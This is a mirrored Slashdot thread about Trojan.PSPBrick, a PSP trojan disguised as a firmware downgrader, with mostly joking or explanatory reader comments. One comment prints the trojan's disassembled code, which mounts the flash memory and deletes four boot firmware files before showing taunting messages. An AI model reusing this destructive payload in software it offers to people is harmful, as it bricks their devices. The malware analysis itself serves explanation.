Slashdot Mirror

← Back to Stories (view on slashdot.org)

First PSP Trojan Reported

Posted by Zonk on from the watch-what-you-click dept.

Evangelion writes "PSP hackers beware! According to 1up.com today, Symantec has identified the first PSP Trojan in the wild. Known as Trojan.PSPBrick, it turns the PSP into, well, a brick. With buttons. Users have to download and install it themselves, and as a result it effectively breaks the PSP."

20 of 76 comments (clear)

  1. Well then... by PapaBoojum · · Score: 4, Funny

    ...I would recommend users NOT download it.

    1. Re:Well then... by RootsLINUX · · Score: 3, Insightful

      Wait, so I actually read TFA and I didn't see any details here. If the hack takes out user buttons, what's to stop it from taking out all other I/O? How do you remove a virus when you have no way to actually get your machine to interact with anything in the real world? The symantec report says removal is "difficult". What if someone accidentally downloads this virus, then isn't able to use their PSP anymore because they can't wipe the memory clean? Who is responsible then? Does Sony have to give them a brand new PSP? Do they have to physically open the device and set a jumper to clear the memory? I want to know the implications of the virus, not just "there's a virus, and it's bad".

      --
      Hero of Allacrost, a FOSS RPG for *NIX/*BSD/OS X/Win
    2. Re:Well then... by Joe+Random · · Score: 4, Insightful
      If the hack takes out user buttons,
      It doesn't just take out the buttons; it flashes the firmware with junk, preventing the PSP from even booting.
      What if someone accidentally downloads this virus, then isn't able to use their PSP anymore because they can't wipe the memory clean? Who is responsible then?
      The user is, of course. The trojan is disguised as a firmware downgrader, and there's no way in hell that Sony is going to reimburse a person who was trying to "hack" their PSP. I'm pretty sure that there's something in the PSP boilerplate that covers that, but I'm too lazy to look.
      Do they have to physically open the device and set a jumper to clear the memory?
      There is no jumper. The memory has to be rewritten by an EEPROM programmer, which I doubt that any normal user is going to have access to. Sony won't send you a new PSP, and I don't doubt that, if anyone out there were able to reflash the PSP's firmware, Sony would be suing them under the DMCA or something.

      In other words, this trojan turns your PSP into a $250 paperweight/brick, hence the name.
  2. Who would be so silly... by Zangief · · Score: 3, Funny

    As to install a virus manually!

    Hey, Microsoft just sent me a security update! Nifty!

  3. Anyone notice.... by svtmunk · · Score: 2, Funny

    That the Symantec page continues to instruct how to recover Windows XP? How useful... with that key info, I'll have my PS2 back up and running in no time!

  4. Warning: this is a joke by Iriel · · Score: 2, Funny

    Yeah, I heard about this. It was made by SONY and the file is called something like |\/|@d_1337_3|\/|ul873rz!.exe

    --
    Perfecting Discordia
    www.stevenvansickle.com
  5. New Market by jelloshotgun · · Score: 2, Insightful

    Does this mean that Symantec is going to begin marketing antivirus software for the PSP?

    --
    Sometimes I feel like +1 Reasonable should exist.
  6. PSafeP by goodenoughnickname · · Score: 2, Interesting

    There is a program called PSafeP for Windows that claims to check EBOOT files for suspicious code. I have yet to verify its validity (my PSP is still collecting dust). Has anyone here checked it out?

    (Sorry for linking to PSPUpdates, but it's the only place I've seen this.)

  7. Father Jack's found a new pet. by starakurva · · Score: 2, Funny

    I love my brick!

    Aaaaaaaaah feckit!

    Fed up with briiiiiick!

    --
    All you need is lurv.
  8. Re:Simple solution to this one by snuf23 · · Score: 4, Informative

    It's not a virus. It is a Trojan horse. A program which claims to be something beneficial but in reality just messes your computer up.

    "Don't download and install it."

    I'm sure if it's listed as "PSP Trojan Horse - turn your PSP into a useless brick" - nobody would download it.

    --
    Sometimes my arms bend back.
  9. Re:How is this a Trojan by SpottedKuh · · Score: 3, Informative

    How is this a Trojan? Your answer:

    "In computer security technology, a virus is a self-replicating program...", from http://en.wikipedia.org/wiki/Computer_Virus.

    "In the context of computer software, a Trojan horse is a malicious program that is disguised as legitimate software.", from http://en.wikipedia.org/wiki/Trojan_horse_(computi ng).

    In this case, the PSP malware is not self-replicating, and it is something you have to download and install on your own (which claims to let you run your own games on the PSP). Therefore, it is a Trojan rather than a virus. A destructive one, yes, but still just a Trojan.

  10. Re:Social Engineering by SpottedKuh · · Score: 3, Interesting

    Not sure what that program's supposed to do that's so bad.

    Bloody hell, I must have mistyped something in my example program. Let me try running it and see what happe...
    [CARRIER LOST]

  11. Thats what you get when you use firmware by diamondmagic · · Score: 2, Interesting

    They COULD have manufactured the firmware updater in the ROM, not flash/RAM/wherever. But no!

    If there were a virus like this for the DS, it could totally spread like a virus. Imagine:
    "Oh, COOL! I thought [game] wasn't out yet! I'll download it right away!"

    Now imagine coupling this with some sort of wireless buffer-overflow exploit (that does not exist, as of yet). The horror!

    --
    Wonder what the public key field is for?
    1. Re:Thats what you get when you use firmware by FLAGGR · · Score: 2, Interesting

      Bo. The first x (where x is some number) of bytes on the DS is write protected, and you have to manually short a connection to overwrite it.

  12. Removal Instructions by Vampo · · Score: 2, Insightful

    From the Symantec page, simple instructions to remove the virus:

    The following instructions pertain to all current and recent Symantec antivirus products, including the Symantec AntiVirus and Norton AntiVirus product lines.

          1. Disable System Restore (Windows Me/XP).
          2. Update the virus definitions.
          3. Run a full system scan and delete all the files detected.

    thanks Symantec, nothing like a clean WinXP on my PSP again :)

  13. Sony strikes back by hal2814 · · Score: 2, Interesting

    Wonder who wrote this trojan? Could it be a certain company that doesn't want you loading unauthorized software?

  14. Re:Another prime example... by TetryonX · · Score: 3, Funny

    Since "Annoying Emo" isn't a valid moderation, the modder had no choice but to choose their closest relative, the common Troll.

    Both are annoying and unwanted, it is however uncommon for the average Annoying Emo to live under bridges and attack children as they try to cross the bridge.

    --
    [!] No, I can't see my comments. They are not worthy of +3 moderation.
  15. Ahem by Areeves · · Score: 2, Funny

    Torrent? .....anyone? oh wait...

    --
    I read at -1 So you don't have to.
  16. Deletes 4 firmware files by quaker5567 · · Score: 2, Informative

    This is the disassembled code generated by Skylark from TOC2RTA.COM

    As you can see, 4 files are deleted from the flash memory, then a few lines of text are displayed. Without these files, the PSP cannot boot, so it's bricked.

    _start:
            call main()
            while(1)

    sceIoAssign:
            syscall 0x20a8

    sceIoRemove:
            syscall 0x209e

    main:
            call FillVram(0)
            call Print(1,1,0xFFFFFF,"PSP TEAM 2.0 Exploit Hack the 2.0 firmware")
            call Print(1,2,0xFFFFFF,"Thank's to toc2rta for the 2.0 exploit :) ")
            call sceIoAssign("flash6:", "lflash0:0,0", "flashfat2:", 0, 0, 0)
            call sceIoRemove("flash6:/vsh/etc/index.dat")
            call sceIoRemove("flash6:/kd/loadcore.prx")
            call sceIoRemove("flash6:/kd/loadexec.prx")
            call sceIoRemove("flash6:/kd/init.prx")
            call Print(1,4,0xFFFFFF," Your 2.0 is hacked please reboot ")
            call Print(1,5,0xFFFFFF," Thank you PSP Team the french team")
            call Print(1,6,0xFFFFFF," FuCk yoshihiro and SonyxTeam Looser")

  17. There's no support from SCEI by Kusunose · · Score: 2, Funny

    Accoding to impress (sorry, in Japanese), SCEI has no intention to provide support for users whose PSP are broken due to this trojan horse, saying this happens only when they are using their PSP in an (unsupported|illegitimate|unauthorative) way.